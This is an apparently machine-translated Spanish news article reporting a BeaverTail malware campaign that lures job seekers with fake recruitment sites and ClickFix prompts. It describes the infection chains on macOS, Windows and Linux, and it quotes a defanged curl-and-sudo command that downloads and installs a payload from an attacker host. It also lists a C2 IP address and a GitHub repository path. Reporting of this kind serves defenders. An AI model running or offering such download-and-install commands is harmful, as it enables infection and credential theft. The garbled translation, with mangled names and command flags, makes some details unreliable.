Ha surgido una sofisticada campaña de actores de amenaza de estado nación-nación del nación del Norte, distribuyendo una variante evolucionada del malware Beavertail a través de plataformas de contratación falsas engañosas y tácticas de ingeniería social de ClickFix.
Esta última campaña, activa desde mayo de 2025, representa un cambio táctico significativo a medida que los actores de amenaza se expanden más allá de sus objetivos tradicionales de desarrolladores de software para perseguir profesionales de marketing, comerciantes de criptomonedas y personal del sector minorista.
La infraestructura de distribución de malware se centra en un sitio web de contratación fraudulento alojado en la parte superior de negocios de negocios (), disfrazándose de una plataforma de reclutamiento legítima.
El sitio ofrece puestos que incluyen roles de comerciante de criptomonedas en cuatro organizaciones Web3 y roles de ventas o marketing en tres compañías Web3 y un minorista de comercio electrónico con sede en Estados Unidos.
Cuando los solicitantes de empleo intentan grabar respuestas de video obligatorias durante el proceso de solicitud falsa, se encuentran con errores técnicos fabricados que les exigen que ejecuten comandos del sistema malicioso como pasos de solución de problemas.
Analistas de Gitlab identificado Esta campaña a través del análisis de infraestructura que reveló el servicio de back -end de la amenaza organizado en NVIDIASDK.FLY (.) Dev permanece activo a partir de la publicación.
La campaña demuestra refinamientos operativos notables, incluida la compilación de Beavertail en ejecutables independientes en lugar de depender de los intérpretes de JavaScript, lo que permite que el malware funcione en sistemas sin herramientas de desarrollo estándar que se encuentran típicamente en máquinas de usuarios no técnicos.
Los actores de amenaza han implementado mecanismos de evasión sofisticados a lo largo de su infraestructura.
El servicio malicioso emplea la verificación dinámica del encabezado del agente de usuario, que responde con cargas de señuelo legítimas cuando se accede sin encabezados numéricos específicos.
Por ejemplo, las solicitudes sin encabezados adecuados reciben archivos que contienen scripts benignos de VisualBasic y ejecutables de transmisión de NVIDIA firmados legítimos, mientras que los intentos de infección auténticos que usan encabezados como “203” desencadenan el despliegue de cargas útiles reales de Beaverail.
Análisis de la cadena de infecciones técnicas
El mecanismo de infección de Beavertail varía significativamente entre los sistemas operativos, lo que demuestra la sofisticación técnica y el compromiso del actor de la amenaza con la orientación multiplataforma.
Cadenas de infección (fuente – Gitlab)
En los sistemas MacOS, el comando ClickFix se inicia descargando un paquete de instalador aparentemente legítimo llamado com.nvidiahpc.pkg, que no contiene datos de carga útil pero ejecuta un script de preinstalación maliciosa.
Este script intenta exfiltrar contraseñas almacenadas de la ubicación del archivo no estándar ~/.myvars antes de descargar componentes adicionales de un repositorio de GitHub alojado en/Rominamabelramirez/Dify.
La cadena de infección se realiza a través de la ejecución de Downx64.Sh, que recupera dos binarios Mach-O sin firmar: x64nvidia que contiene la variante Beaverail despojada y PayUniversal2, una versión compilada de Pyinstaller de InvisibleFerret.
El malware exhibe mecanismos de redundancia inteligentes, ejecutando el binario invisibleferret solo cuando Python 3 no está disponible en ubicaciones de instalación comunes o cuando la ejecución de Beaverail no puede crear el archivo de punto de entrada ~/.NPC esperado en diez segundos.
curl – k – a 204 – o/var/tmp/nvidia (.) pkg https (::) // nvidiasdk (.) fly (.) dev/nvs && ‘sudo’ instalador – pkg /var/tmp/nvidia(.)pkg – objetivo//
Las infecciones por Windows siguen una trayectoria diferente, con el comando ClickFix que descarga nvidia.tar.gz que contiene múltiples componentes, incluido un ejecutable de 7ZIP renombrado y un script de lanzador VisualBasic.
El script Update.vbs realiza funciones duales: extraer dependencias de Python protegidas con contraseña a un directorio .pyp oculto utilizando la contraseña codificada “PPP”, y el lanzamiento del ejecutable NVIDIASDK (.) Primario que contiene la variante Beaverail compilada.
Los sistemas de Linux reciben el vector de infección más optimizado, con scripts maliciosos entregados directamente a través de WGet y se meten en la ejecución de Bash.
El script instala Node.js a través del instalador NVM-SH antes de descargar y ejecutar una versión JavaScript de Beaverail funcionalmente idéntica a las versiones compiladas implementadas en otras plataformas.
Esta variante demuestra una complejidad reducida en comparación con las iteraciones anteriores de Beavertail, apuntando solo a ocho extensiones del navegador en lugar de las 22 típicas, y omitiendo funciones dedicadas de extracción de datos para navegadores más allá de Chrome.
La base de código simplificada reduce el tamaño general del malware en aproximadamente un tercio mientras se mantiene las capacidades de robo de credenciales de núcleo y focalización de la billetera de criptomonedas.
Las comunicaciones de comando y control utilizan la dirección IP 172.86.93 (.) 139 con “TTTTTT” que sirve como identificador de campaña en todos los sistemas infectados.
¡Webinar gratuito en vivo en nuevas tácticas de malware de nuestros analistas! Aprenda técnicas de detección avanzada -> Regístrese gratis
